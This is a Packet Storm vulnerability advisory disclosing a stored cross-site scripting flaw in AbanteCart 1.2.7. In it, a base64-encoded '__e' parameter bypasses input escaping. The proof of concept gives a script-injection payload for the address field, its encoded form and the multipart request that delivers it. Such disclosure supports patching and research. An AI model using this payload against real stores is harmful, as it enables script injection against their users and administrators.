AbanteCart 1.2.7 Cross Site Scripting

2016-12-06T00:00:00
ID PACKETSTORM:140049
Type packetstorm
Reporter Kacper Szurek
Modified 2016-12-06T00:00:00

Description

                                        
                                            `# Exploit Title: AbanteCart 1.2.7 Stored XSS  
# Date: 06-12-2016  
# Software Link: http://www.abantecart.com/  
# Exploit Author: Kacper Szurek  
# Contact: http://twitter.com/KacperSzurek  
# Website: http://security.szurek.pl/  
# Category: webapps  
  
1. Description  
  
By default all user input is escaped using `htmlspecialchars`.  
  
But we can pass `__e` value which is base64 encoded and unfortunatelly those datas are not cleaned.  
  
http://security.szurek.pl/abantecart-127-stored-xss-and-sql-injection.html  
  
2. Proof of Concept  
  
For example `address_1="><script>alert(2);</script>&` can be encoded as: `__e=YWRkcmVzc18xPSI+PHNjcmlwdD5hbGVydCgyKTs8L3NjcmlwdD4m`.  
  
So create new order and set `address_1` value as `__e` using for example Burp:  
  
```  
Content-Disposition: form-data; name="__e"  
  
YWRkcmVzc18xPSI+PHNjcmlwdD5hbGVydCgyKTs8L3NjcmlwdD4m  
```  
`